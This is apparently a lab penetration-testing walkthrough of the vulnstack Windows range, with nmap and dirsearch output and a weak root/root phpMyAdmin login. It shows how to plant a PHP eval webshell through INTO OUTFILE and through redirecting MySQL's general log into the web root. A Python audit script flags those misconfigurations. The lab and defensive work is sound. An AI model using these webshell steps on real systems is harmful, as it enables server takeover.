vulnstack-Win2K3 Metasploitable
vulnstack-win7
Start phpStudy from the C drive
vulnstack-winserver08
Windows 7: (internal: 192.168.52.143 / external: 192.168.31.212 (the external address is assigned according to your physical host))
Windows 2003: (internal: 192.168.52.141)
Windows 2008: (internal: 192.168.52.138)
(1)nmap
nmap -T4 -A 192.168.31.212 -o 212.txt
212.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 11:26 CST
Nmap scan report for stu1 (192.168.31.212)
Host is up (0.00061s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql MySQL (unauthorized)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -24s, deviation: 0s, median: -25s
| smb2-time:
|   date: 2023-07-19T03:27:30
|_  start_date: 2023-07-19T01:50:17
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 000c29b43b31 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.47 seconds
(2) dirsearch scan of port 80
[11:28:33] 200 - 14KB - /l.php
[11:28:40] 301 - 241B - /phpMyAdmin -> http://192.168.31.212/phpMyAdmin/
[11:28:42] 200 - 4KB - /phpMyAdmin/index.php
[11:28:42] 200 - 4KB - /phpMyAdmin/
[11:28:42] 200 - 4KB - /phpMyadmin/
[11:28:42] 200 - 71KB - /phpinfo.php
[11:28:42] 200 - 4KB - /phpmyAdmin/
[11:28:42] 301 - 241B - /phpmyadmin -> http://192.168.31.212/phpmyadmin/
[11:28:42] 200 - 4KB - /phpmyadmin/
[11:28:42] 200 - 2KB - /phpmyadmin/README
[11:28:42] 200 - 32KB - /phpmyadmin/ChangeLog
[11:28:42] 200 - 4KB - /phpmyadmin/index.php
[11:28:56] 403 - 226B - /web.config::$DATA
(1) Weak-password login
http://192.168.31.212/phpmyadmin/ weak password root / root
(2) Writing a webshell via phpMyAdmin
Two approaches to writing a webshell from phpMyAdmin
One: into the website root directory
① Query: select @@basedir;
② Write the file with into outfile
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/cc.php'; # the website root directory
Check the current value of secure-file-priv:
show variables like '%secure%';
Writing the shell failed.
Two: use the MySQL log to write the file
general_log is the logging state: ON means enabled, OFF means disabled;
general_log_file is the path where the log is saved.
show variables like '%general%'; # check the log status --> this reveals both the logging state and the save path
SET GLOBAL general_log='on';
SET GLOBAL general_log_file='<web root>'; # set the log path to the web root, i.e. the location where the shell is to be written
SELECT '<?php eval($_POST["cmd"]);?>'; # run the statement --> it is written straight into the log file
general_log_file C:\phpStudy\MySQL\data\stu1.log
SET GLOBAL general_log='on';
SET GLOBAL general_log_file='C:\phpStudy\WWW\xiaoyu.php';
Write the shell
Access it:
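As an added defender-side check, not part of the original walkthrough: a Python audit over a SHOW VARIABLES snapshot that flags the two conditions the steps above depend on (an empty secure_file_priv, and general_log pointing outside datadir or into the web root with a script extension), plus a scan of general-log lines for PHP open tags. The web root C:\phpStudy\WWW and the variable snapshots are constructed from values on this page; the baseline's secure_file_priv of NULL and the list of executable extensions are assumptions.

```python
import ntpath
import re

# Added example: audit the two MySQL file-write paths used above.
# Extensions the Apache/PHP stack on this range would execute (assumption).
SCRIPT_EXTS = {".php", ".phtml", ".php5"}
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)

# Constructed SHOW VARIABLES snapshots: a baseline and the state after the log trick.
WEB_ROOTS = [r"C:\phpStudy\WWW"]
BASELINE_VARS = {"secure_file_priv": "NULL", "general_log": "OFF",
                 "general_log_file": r"C:\phpStudy\MySQL\data\stu1.log",
                 "datadir": "C:\\phpStudy\\MySQL\\data\\"}
TAMPERED_VARS = dict(BASELINE_VARS, secure_file_priv="", general_log="ON",
                     general_log_file=r"C:\phpStudy\WWW\xiaoyu.php")


def _under(path, root):
    """True if a Windows path lies at or below root (case-insensitive)."""
    p = ntpath.normcase(ntpath.normpath(path))
    r = ntpath.normcase(ntpath.normpath(root))
    return p == r or p.startswith(r.rstrip("\\") + "\\")


def audit_mysql_variables(variables, web_roots):
    """Return findings; an empty list means neither write path is open."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":  # empty string = unrestricted; NULL/None = import/export disabled
        findings.append("secure_file_priv is empty: INTO OUTFILE may write anywhere")
    elif sfp is not None and sfp.upper() != "NULL":
        for root in web_roots:
            if _under(sfp, root) or _under(root, sfp):
                findings.append(f"secure_file_priv {sfp} overlaps web root {root}")
    if str(variables.get("general_log", "OFF")).upper() == "ON":
        logfile = variables.get("general_log_file", "")
        datadir = variables.get("datadir", "")
        if datadir and not _under(logfile, datadir):
            findings.append(f"general_log_file {logfile} is outside datadir {datadir}")
        for root in web_roots:
            if _under(logfile, root):
                findings.append(f"general_log_file {logfile} is inside web root {root}")
        if ntpath.splitext(logfile)[1].lower() in SCRIPT_EXTS:
            findings.append(f"general_log_file {logfile} has a server-executable extension")
    return findings


def find_php_in_log(lines):
    """Return general-log lines carrying a PHP open tag, the trace SELECT '<?php ...' leaves."""
    return [line for line in lines if PHP_TAG.search(line)]
```

Run the audit from a scheduled job on the database host and alert on any non-empty result; the general-log scan catches the same activity after the fact when the log still points at its normal location.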
Win7 crashed, haha.